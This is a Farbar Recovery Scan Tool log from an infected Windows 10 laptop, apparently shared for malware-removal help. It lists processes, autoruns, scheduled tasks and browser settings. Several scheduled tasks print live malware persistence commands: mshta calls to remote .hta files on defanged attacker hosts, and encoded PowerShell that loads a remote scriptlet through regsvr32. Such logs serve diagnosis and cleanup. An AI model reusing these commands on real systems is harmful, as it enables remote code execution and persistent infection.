Sei sulla pagina 1di 9

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-01-2020

Ran by Admin (administrator) on DESKTOP-9TP1502 (Hewlett-Packard HP EliteBook


8560p) (29-01-2020 16:49:32)
Running from C:\Users\Admin\Documents
Loaded Profiles: Admin (Available Profiles: Admin)
Platform: Windows 10 Pro Version 1909 18363.535 (X64) Language: English (United
States)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-
recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will
not be moved.)

() [File not signed] C:\Program Files\FileBX\Fbx32helper.exe


() [File not signed] C:\Users\Admin\AppData\Local\Temp\crack.exe
() [File not signed] C:\Users\Admin\Downloads\Utils\StartUp\Double Right-Click =
Middle-Click AHK\Double Right-Click = Middle-Click.exe
(Adobe Inc. -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat
2017\Acrobat\acrotray.exe
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common
Files\Adobe\ARM\1.0\armsvc.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGSService.exe
(Alexandr Irza) [File not signed]
C:\Users\Admin\Downloads\Utils\Volume2\Volume2.exe
(Arvato Digital Services Canada Inc -> arvato digital services llc) C:\Program
Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe
(GuinpinSoft inc) [File not signed] C:\Program Files\Common
Files\cdarbsvc\cdarbsvc_v1.0.0_x64.exe
(Hyperionics Technology LLC) [File not signed] C:\Program Files\FileBX\FileBX.exe
(Lagerkvist Teknisk Rådgivning i Borås HB -> Olof Lagerkvist)
C:\Windows\System32\imdsksvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common
Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation)
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.222.1110.0006\FileCoAuth.exe
(Microsoft Corporation -> Microsoft Corporation)
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common
Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MRT.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\msdt.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\sdiagnhost.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD)
C:\Windows\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD)
C:\Windows\System32\atiesrxx.exe
(Open-Shell) [File not signed] C:\Program Files\Open-Shell\StartMenu.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common
Files\Java\Java Update\jusched.exe
(Oracle Corporation) [File not signed] C:\ProgramData\Oracle\Java\java.exe
(Oracle Corporation) [File not signed] C:\ProgramData\Oracle\Java\java.exe
(Reason Software Company Inc. -> Reason Software Company Inc.) C:\Program Files
(x86)\Unchecky\bin\unchecky_bg.exe
(Reason Software Company Inc. -> Reason Software Company Inc.) C:\Program Files
(x86)\Unchecky\bin\unchecky_svc.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program
Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program
Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program
Files\Synaptics\SynTP\SynTPHelper.exe

==================== Registry (Whitelisted) ===================


(If an entry is included in the fixlist, the registry item will be restored to
default or removed. The file will not be moved.)

HKLM\...\Run: [Open-Shell Start Menu] => C:\Program Files\Open-Shell\StartMenu.exe


[224768 2019-12-04] (Open-Shell) [File not signed]
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. ->
Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common
Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe
Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [crack] => C:\Users\Admin\AppData\Local\Temp\crack.exe [496128
2015-06-21] () [File not signed] <==== ATTENTION
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common
Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. ->
Oracle Corporation)
HKLM-x32\...\Run: [QuickFinder Scheduler] => c:\Program Files
(x86)\Corel\WordPerfect Office X9\Programs\QFSCHD190.EXE [247512 2018-05-13] (Corel
Corporation -> Corel Corporation)
HKLM-x32\...\Run: [PdxRegCl] => C:\Program Files
(x86)\Paradox\Programs\PdxRegCl.exe [54632 2010-10-27] (Corel Corporation -> Corel
Corporation)
HKLM\...\Policies\Explorer: [NoRecentDocsHistory] 1
HKLM\...\Policies\Explorer: [NoDrivesInSendToMenu] 1
HKLM\ DisallowedCertificates: 1990649205B55EAB5D692E9EDB1BE0DDD3B037DE (U)
HKLM\ DisallowedCertificates: 3AD010247A8F1E991F8DDE5D47989CB5202E5614 (U)
HKLM\ DisallowedCertificates: 6A2C691767C2F1999B8C020CBAB44756A99A0C41 (U)
HKLM\ DisallowedCertificates: 6B6FA65B1BDC2A0F3A7E66B590F93297B8EB56B9 (U)
HKLM\ DisallowedCertificates: 8835437D387BBB1B58FF5A0FF8D003D8FE04AED4 (U)
HKLM\ DisallowedCertificates: 9FEB091E053D1C453C789E8E9C446D31CB177ED9 (U)
HKLM\ DisallowedCertificates: C597D4E7FF9CE5BD3EC321C11827FCA9294A6BA1 (U)
HKLM\ DisallowedCertificates: D3FD325D0F2259F693DD789430E3A9430BB59B98 (U)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Run: [Volume2] =>
C:\Users\Admin\Downloads\Utils\Volume2\Volume2.exe [4798976 2019-07-19] (Alexandr
Irza) [File not signed]
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Run: [crack] =>
C:\Users\Admin\AppData\Local\Temp\crack.exe [496128 2015-06-21] () [File not
signed] <==== ATTENTION
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[NoDrivesInSendToMenu] 1
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[HideSCAVolume] 0
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[NoRecentDocsHistory] 1
HKU\S-1-5-21-957440600-544596904-2528706255-1001\...\Policies\Explorer:
[NoRecentDocsMenu] 1
HKU\S-1-5-21-957440600-544596904-2528706255-1001\Control
Panel\Desktop\\SCRNSAVE.EXE -> C:\WEP\IDLEWILD.EXE
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-
AFF1-A69D9E530F96}] -> C:\Program Files
(x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-16]
(Google LLC -> Google LLC)
AppInit_DLLs: ldntvdm.dll => C:\Windows\system32\ldntvdm.dll [18432 2019-01-25]
(Microsoft Corporation) [File not signed]
IFEO\notepad.exe: [Debugger]
"C:\Users\Admin\Downloads\Utils\Notepad3Portable\Notepad3Portable.exe" -z
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\Caffeine.exe.lnk [2019-12-03]
ShortcutTarget: Caffeine.exe.lnk -> C:\Utils\StartUp\Caffeine.exe (No File)
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\crack.exe [2015-06-21] () [File not signed]
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\Double Right-Click = Middle-Click.exe.lnk [2020-01-05]
ShortcutTarget: Double Right-Click = Middle-Click.exe.lnk ->
C:\Users\Admin\Downloads\Utils\StartUp\Double Right-Click = Middle-Click AHK\Double
Right-Click = Middle-Click.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FileBox
eXtender.lnk [2019-12-21]
ShortcutTarget: FileBox eXtender.lnk -> C:\Program Files\FileBX\FileBX.exe
(Hyperionics Technology LLC) [File not signed]
GroupPolicy\User: Restriction ? <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The
file will not be moved unless listed separately.)

Task: {0CB832CC-09B7-4E30-B277-D55D4BE4BDF6} - System32\Tasks\Norton Remove and


Reinstall\Norton Remove and Reinstall =>
C:\Users\Admin\Downloads\CleanWipe\NRnR.exe
Task: {1624BFAE-09F2-4C28-AE31-1E887C96268E} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup =>
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe
[469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {23E5EB0F-E787-40DE-9A1A-3A7F2AEA1F42} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification =>
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe
[469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2D9160F9-A1CE-4ED2-BF6B-5A040087277E} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache
Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-
0\MpCmdRun.exe [469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft
Corporation)
Task: {31861349-4539-4A33-99A1-EEBCB7D64831} -
System32\Tasks\Microsoft\Windows\UPnP\UPnPHost => C:\Windows\System32\cmd.exe /c
mshta hxxp://qlqd5zqefmkcr34a.onion.pet/win/checking.hta <==== ATTENTION
Task: {33BE6AC3-8AC5-4F66-BDC1-BF04A162B0FD} -
System32\Tasks\Microsoft\Windows\MobilePC\DetectPC =>
C:\Windows\System32\cmd.exe /c C:\Windows\Fonts\sasd.bat
Task: {3B55A0AB-9B7C-4EE6-AE25-8D0778462710} -
System32\Tasks\Microsoft\Windows\Shell\updshell => cmd /c sc start WinDefends
Task: {3D0FACDF-4FFC-4369-9850-CAAAC2273F03} -
System32\Tasks\Microsoft\Windows\Shell\WindowsShellUpdate =>
C:\Windows\System32\cmd.exe /c mshta hxxp://195.123.234.33/win/update.hta <====
ATTENTION
Task: {40D3A1B4-4444-4366-84DB-74BD9125B41F} -
System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files
(x86)\Corel\CUH\v2\CUH.exe [1677600 2019-09-06] (Corel Corporation -> Corel
Corporation)
Task: {420DDE2F-37E4-4C15-917D-5A951944B140} -
System32\Tasks\Microsoft\Windows\Autochk\SystemProxy => cmd /c sc start thundersec
Task: {4A86C2A9-9A94-4417-9ADF-C2950EB7D62E} -
System32\Tasks\Microsoft\Windows\EDP\EDP App Lock Task =>
C:\Windows\System32\cmd.exe /c mshta hxxp://asq.r77vh0.pw/win/checking.hta <====
ATTENTION
Task: {637173A8-4D01-4881-9C0D-D552128FB844} -
System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB =>
C:\Windows\system32\MRT.exe [129221664 2019-12-13] (Microsoft Windows -> Microsoft
Corporation)
Task: {7BCE35A1-403F-417D-BB2C-5C3AEF69FBEC} -
System32\Tasks\Microsoft\Windows\Registry\RegBackup =>
C:\Windows\System32\cmd.exe /c schtasks /tn
\Microsoft\Windows\Bluetooth\UpdateDeviceTask /run
Task: {7E8EE202-2A2E-4773-AC5C-E6B4FEB9E775} - System32\Tasks\Adobe Acrobat Update
Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656
2019-09-11] (Adobe Inc. -> Adobe Systems)
Task: {8F5041C7-629C-4FC7-A9F8-E4EF3F5633C3} -
System32\Tasks\Microsoft\Windows\EDP\EDP App Update Cache =>
C:\Windows\System32\cmd.exe /c mshta hxxps://asq.r77vh0.pw/win/hssl/r7.hta <====
ATTENTION
Task: {95E3F157-8062-43CA-A7C1-5F4B3188AAC2} - System32\Tasks\Synaptics TouchPad
Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2824792 2017-08-25]
(Synaptics Incorporated -> Synaptics Incorporated)
Task: {A2E25CD4-7C14-4F08-8CCB-4FC60D6938AA} -
System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files
(x86)\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)
Task: {AB209B9C-0016-4F8A-BA7D-6EE5F84FEB92} -
System32\Tasks\Microsoft\Windows\Bluetooth\UpdateDeviceTask =>
C:\ProgramData\Oracle\Java\java.exe [ ]
Task: {AFEB3C40-5803-43B4-9FC1-FE60C9CEC7D2} -
System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization
Files-S-3-5-21-2236678156-433529325-2142214268-1138 => cmd /c powershell -nop -noni
-w 1 -enc
cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcABzADoALwAvAGEAcwBxAC4AZAA
2AHMAaABpAGkAdwB6AC4AcAB3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG
8AYgBqAC4AZABsAGwA
Task: {C768FC0D-FFC7-4533-9D15-7F25BFEADCF3} -
System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization
Files-S-3-5-21-2236678155-433529325-2142214968-1138 => cmd /c powershell -nop -noni
-w 1 -enc
cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcABzADoALwAvAGEAcwBxAC4AcgA
3ADcAdgBoADAALgBwAHcALwB3AGkAbgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAG
oALgBkAGwAbAA=
Task: {C802F363-CF2D-4AC7-93EA-D560CDE80235} -
System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization
=> cmd /c powershell -nop -noni -w 1 -enc
cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADkANQAuADEAMgA
zAC4AMgAzADQALgAzADMALwB3AGkAbgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAG
oALgBkAGwAbAA=
Task: {D596E2AC-2F20-4FD3-AADA-3A4F2FE6EC3B} - System32\Tasks\Update Shell =>
powershell -w 1 -C IEX
([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($
(Get-ItemProperty -Path HKCU:\Software\cr -Name d -ErrorAction Stop).d)))
Task: {DA32F164-750E-4CEE-B8E6-31D53A6FC945} -
System32\Tasks\Microsoft\Windows\UPnP\UPnPClient Task =>
C:\Windows\System32\cmd.exe /c mshta hxxps://asq.d6shiiwz.pw/win/hssl/d6.hta <====
ATTENTION
Task: {EA4A5FC7-BDDB-4EB3-8A8E-80BFCBEA953E} -
System32\Tasks\Microsoft\Windows\Shell\WinShell => C:\Windows\System32\cmd.exe /c
mshta hxxp://195.123.234.33/win/checking.hta <==== ATTENTION
Task: {ECE0A289-26F2-4CBE-81D5-129713A3832B} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan
=> C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe
[469928 2019-12-03] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F128192E-10B0-4BA2-A028-D386FD15BDA5} -
System32\Tasks\Microsoft\Windows\MUI\LPupdate => C:\Windows\System32\cmd.exe /c
powershell -exec bypass C:\Windows\Fonts\del.ps1
Task: {F581427B-7FB0-47BB-9527-2C2F6DA884A0} - System32\Tasks\AdobeGCInvoker-1.0 =>
C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe
[2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {F8EADFDE-3249-496D-8D0B-FFA45E3615EA} -
System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files
(x86)\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The
file which is running by the task will not be moved.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed


or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.50.1
Tcpip\..\Interfaces\{2b857c52-1387-4b35-a4e8-0e3bef81c552}: [NameServer]
1.1.1.1,8.8.8.8
Tcpip\..\Interfaces\{2b857c52-1387-4b35-a4e8-0e3bef81c552}: [DhcpNameServer]
192.168.50.1

Internet Explorer:
==================
HKU\S-1-5-21-957440600-544596904-2528706255-
1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} ->
C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\x64\AcroIEFavStub.dll [2017-04-24] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-
665D8EE6A077} -> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\x64\AcroIEFavStub.dll [2017-04-24] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} ->
C:\Program Files (x86)\Java\jre1.8.0_241\bin\ssv.dll => No File
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910}
-> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\AcroIEFavStub.dll [2017-04-24] (Adobe Systems,
Incorporated -> Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->
C:\Program Files (x86)\Java\jre1.8.0_241\bin\jp2ssv.dll => No File
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-
665D8EE6A077} -> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\AcroIEFavStub.dll [2017-04-24] (Adobe Systems,
Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-
0819E2EAAC93} - C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\x64\AcroIEFavStub.dll [2017-04-24] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-
0819E2EAAC93} - C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\2017\AcroIEFavStub.dll [2017-04-24] (Adobe Systems,
Incorporated -> Adobe Systems Incorporated)
Filter: text/xml - {807563E5-5146-11D5-A672-00B0D022E945} -
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL No File
FireFox:
========
FF HKLM\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] -
C:\Program Files (x86)\Adobe\Acrobat
2017\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-
windows.xpi
FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat
2017\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-
windows.xpi [2019-11-28]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] -
C:\Program Files (x86)\Adobe\Acrobat
2017\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-
windows.xpi
FF Plugin-x32: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files
(x86)\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files
(x86)\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files
(x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2019-12-13] (Google LLC ->
Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files
(x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2019-12-13] (Google LLC ->
Google LLC)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat
2017\Acrobat\Air\nppdf32.dll [2019-11-28] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default [2020-01-
29]
CHR HomePage: Default -> hxxps://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.cnet.com/","hxxp://iron-
start.com/","hxxps://www.google.com/","hxxp://www.google.com","hxxp://home.torchbro
wser.com","hxxps://www.google.com/"
CHR DefaultSearchURL: Default ->
hxxps://www.virustotal.com/gui/images/manifest/icon-192x192.png
CHR Session Restore: Default -> is enabled.
CHR Extension: (Slides) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-12-03]
CHR Extension: (Flash Video Downloader) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2019-12-03]
CHR Extension: (BetterTTV) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\ajopnjidmegmdimjlfnijceegpefgped [2020-01-21]
CHR Extension: (Docs) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-12-03]
CHR Extension: (Google Drive) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-12-03]
CHR Extension: (Tidy Bookmarks) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\bennikkpnelmfdiijpdclfincmnoabae [2019-12-03]
CHR Extension: (YouTube) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-12-03]
CHR Extension: (Search by Image) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\cnojnbdhbhnkbcieeekonklommdnndci [2020-01-21]
CHR Extension: (Tampermonkey) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2019-12-03]
CHR Extension: (VirusTotal) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\dnopbpmlkabcondfpckfnhgabfcncjmg [2019-12-03]
CHR Extension: (Adobe Acrobat) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-12-21]
CHR Extension: (MyJDownloader Browser Extension) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\fbcohnmimjicjdomonkcbcpbpnhggkip [2019-12-19]
CHR Extension: (Sheets) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-12-03]
CHR Extension: (Chrome Shortcuts) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\fmemikdglgekjjclafhhebcdapfcbhap [2019-12-03]
CHR Extension: (Nano Adblocker) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\gabbbocakeomblphkmmnoamkioajlkfo [2020-01-05]
CHR Extension: (Nano Defender) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\ggolfgbegefeeoocgjbmkembbncoadlb [2020-01-21]
CHR Extension: (LastPass: Free Password Manager) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2020-01-29]
